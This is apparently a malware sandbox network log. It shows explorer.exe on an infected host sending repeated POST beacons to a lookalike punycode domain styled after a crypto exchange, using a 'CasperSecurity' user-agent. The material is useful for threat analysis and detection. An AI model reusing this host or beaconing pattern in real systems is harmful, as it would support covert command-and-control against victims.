                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.445791960 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.450706005 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.198432922 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:50 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evYmmJB53DHllMYjMHqfklnueRKYPa%2BHWxqTWFsX1XuUIkn7d2Liio7anHWK4pfj%2B6BTBBGF%2FjnDtwmCjjIlM9uq6SyotyT%2FTt5BlfnqbkO0gmTFVE8gNAD%2Bj9rwvHB5nei9IyLkjHRK%2BsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40e79e3343ee-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                100192.168.2.449908188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.321115017 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.325982094 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.072787046 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scuphJ96CC%2BLa7ZwMeLQ3YOP65PN0gqc55yeLK%2Fz49BhPlbYqYAiEC00o2loUVEYmEnigE8eYsrST1F8nWVy%2Br87nopY3PudsFm1swFRPanj1kHAbnv8Q8YcDbxTIKR%2FMF1pH4rmE2VCitE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40ed39b441ec-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                101192.168.2.449909188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.211390972 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.216211081 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.973701954 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLDhko3I90Dd9%2FfDXr6nKWyr70DaBL38kHlNWI4kJZDWv4pcEWXSqhb5fgdn5TE5ZBlOEBrqejrpoYUDB8RNCCReaimEmjmIPLDq6NM3bKQxNGgeBsrRnl4BFt6q5d3%2Bzfl9JlXrqRl%2FWNQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40f2bec241fb-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                102192.168.2.449911188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.086477041 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.092047930 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.810226917 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:52 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8njpaJyU7Iv2xtwhyEQ3%2Fbx28pbbzxk%2FtXv%2FRZthv073rEQmKCwTjapKZT7g8c1US7goZ%2BP2HC%2FPl0vZgtS8lQkOz4T6MOMkAUa5K7AkueXXllqkMti35EnVKjdxE32tFGZKXFMxu49Gv8M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40f81c001801-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                103192.168.2.449912188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.930267096 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.936156988 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.770708084 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:53 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uYOYortCLtUj6lQGR9cgEBigEOx5whF20mM9fAGxeeJoV3MJmMc9XdGXW2despEtb%2FKG%2FX5ycqbLq7VaiwiiCupSVWY2DD9OJnsBKVUq%2B4Yj3%2FzhWJdpu%2ByjCAo4mkp0nk1KitffgHY6WtM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40fd5d9a8c5f-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                104192.168.2.449913188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.883497000 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:53.888343096 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.615864038 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMnuIuYapNXWZPdtfeeLqUyKGxrUHWNN2jHtOmpKG1VOzQcghEXgyYhzrxyLbZLp8UcYiqJwyrY3yj716P%2BlzsyXtxgLUQjlmgOn2Vh3yIqCsAbzL85nP4ekwfAg3NLeoWRkBdiChR6JKT8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41037e57c335-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                105192.168.2.449915188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.727535009 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:54.732469082 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.450159073 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:55 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xk0eKU2g%2F9yCcRMeLyMFjvRHpT13JOn6V2Cl6zqpQNez66s36TP1heOmT54uHNCJZXhXbCHPWsrNMhzn0gPoiRCdHBXpnallqHcyJp5%2FIg2TNlCgH%2BZ6VBaD4kmnZ5CvBMEVAiSb8QfoFl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4108acdd43f2-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                106192.168.2.449916188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.591739893 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:55.596731901 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.340181112 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:56 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2F7BLP529FeFk%2B%2BBV8BBYhaBFo3ho6dnsdqStyk8yzSLrZovLKSx%2BiMD0LC4CIeuJxZ6dtTp5mssKYZ7j0Gwi58VFwStQnzmWJm9my0t7hwzTgyGZXaSaC9jUd%2F6YPhQxyTdJlWz79ovPjk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef410e0e8132e4-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                107192.168.2.449917188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.461822987 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:56.466818094 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.185849905 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:57 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxOA8YhicHstKZsI43mXCY%2FbWLj7AIFBm8Vhkc4qErOgniHYAox0KshVdrjV%2BuAWb6%2Bgg4%2B6261HLZLm1PDDb65QGr82fumoG%2FEaPmYxLNKlh9Y2kfKTGhZrdjt1aPhUOLIrONoAHK3%2BjRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41138a0443c9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                108192.168.2.449918188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.309123039 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:57.318816900 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.053399086 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9h3HQL4xBjFieSxJtKjZNkh4Ohe5Xnuv7dAx9kcVf4aGPiGxcwCBRJ%2F4C0pPPTZwo1%2Fvg4CT3gTrP7E1XwHDy2YoQuUnti%2FByc16UF%2F7b%2BMUMwQFZFZr9RgTik3UClp%2BTIbDUy7W6YG09k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4118ec8e4408-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                109192.168.2.449919188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.182972908 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.188524008 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.874351025 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oLF68PtTlLzcEy7ywvCJp5VgBDVDQoRDdwuDqLsb2Ok78nteQRnIEGy7x%2Bll9ixNHAv3gIduVEU2MzodK7SX3IxckYjXPlWCQYP%2F6rcY6RfAERJQKtHVujXcqOGK5WQDWHOOq6CGDKiQCBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef411e2fc05e6e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                110192.168.2.449921188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.992696047 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:58.997484922 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.805322886 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:59 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WQ57QIjr4lUWya4FFfRfJnDrTFJGSO5gpz5D%2BUy%2FcCgOCyxkRD8a%2FYaAh4FJsQbL%2BanL99pjbKslHMZ1bp8jhHUlo0nkaGQYYthktNkFyM69dGyDhwHEXOe5EBtA02%2F3ntrRoTur5ogFnM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41235ed70cc4-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                111192.168.2.449922188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.933231115 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:59.938119888 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.650013924 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:00 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2onn74fsGZTtQDVBpGUPB8qPI0P6%2BvxtMC%2BX%2BerLIBVFPBa7smuCu2aSD5Npz0%2BTGHcKKivwnZzKs0MpUGyPHMwYnC%2F1Vv8CGvtO4hWEdD%2BGoey9f3GV1Qrbm8qAUQWBlA3Q4NDspPEBO9c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41293fb6435e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                112192.168.2.449923188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.774224997 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:00.779117107 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.501929045 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:01 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
